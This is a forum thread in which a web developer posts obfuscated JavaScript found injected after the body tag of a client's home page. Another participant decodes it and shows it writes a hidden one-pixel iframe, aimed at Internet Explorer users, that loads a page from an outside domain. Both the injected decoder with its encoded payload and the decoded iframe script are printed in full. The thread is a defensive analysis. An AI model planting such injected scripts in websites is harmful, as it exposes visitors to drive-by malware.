Unknown javascript appeared in a clients home page



I'm hoping someone might help us understand the code listed below.

One of our clients has been having unknown Javascript appear in their
home page.
The client swears that they are not changing the page and we have been
on vacation since we last removed the first 'unknown' code.

The following code appears this week on their site:
<script language=JavaScript>function decrypt_p(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,25,32,12,23,26,22,33,27,8,0,0,0,0,0,0,51,44,41,20,46,52,18,42,0,49,29,60,50,11,36,13,48,35,15,10,55,34,56,37,57,21,39,0,0,0,0,3,0,2,30,61,14,31,1,62,19,7,58,16,54,9,45,5,17,6,47,59,24,40,38,28,4,43,53);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("[email protected][email protected][email protected][email protected][email protected][email protected]@[email protected]@[email protected]_KztbtWiD1vSLgVThdj2rB23jml1GucveRszi0v")</script>

Has anyone seen this before? I did a quick search and it mentioned
somehting about it being and encryption technique.

Previously we had a script that called pop-up ads. We removed that, 3
days later (from server logs) this appeared.

Could the hosting company be compromized?

Any information or insight is much appreciated.




Mr. Ken

drclue said:
It looks to act upon a big old string of encoded material to produce
something written into the document.

It would help to know in what context this piece of script appeared.

The code was inserted into the body of the page, directly after the
<body> tag.
The page does not appear to have any text, other than what the client
has supplied, appearing on the page after it appears in the browser.


(e-mail address removed) wrote:
decrypt_p("[email protected][email protected][email protected][email protected][email protected][email protected]@[email protected]@[email protected]_KztbtWiD1vSLgVThdj2rB23jml1GucveRszi0v")</script>

This is what is run when the page loads. This calls the decrypt
function and passes it this long string of "garbage".

the decrypt function decodes this into the following javascript program
and inserts it into the web page.

<SCRIPT language="JavaScript">
var browserName=navigator.appName;
if (browserName=="Microsoft Internet Explorer") {
document.write('<IFRAME name="PageContainer"
src="http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php" width="1"
height="1" frameborder="0"></IFRAME>');

As you can see, the spyware targets only microsoft internet explorer
likely because it has some security flaw the site wants to exploit.
Basically a web page with the decrypt function will set up a small
iframe (1 pixel in size) and load the page at


Which is presently recorded as being owned by:
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS4.ASDBIZ.BIZ
Name Server: NS3.ASDBIZ.BIZ
Status: ACTIVE
EPP Status: ok
Updated Date: 15-Nov-2006
Creation Date: 12-Oct-2006
Expiration Date: 12-Oct-2007

The web server for this domain is presently down so what the iframe was
actually doing is an open question.

But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.

Mr. Ken

pcx99 said:
The web server for this domain is presently down so what the iframe was
actually doing is an open question.

But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.

Wow, thank you.
Could I assume that this spyware is on the hosts server?

We're developing on the Mac using Text & Dreamweaver. I've done a virus
scan and haven't found anything at all.

Many thanks for the insight.



Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question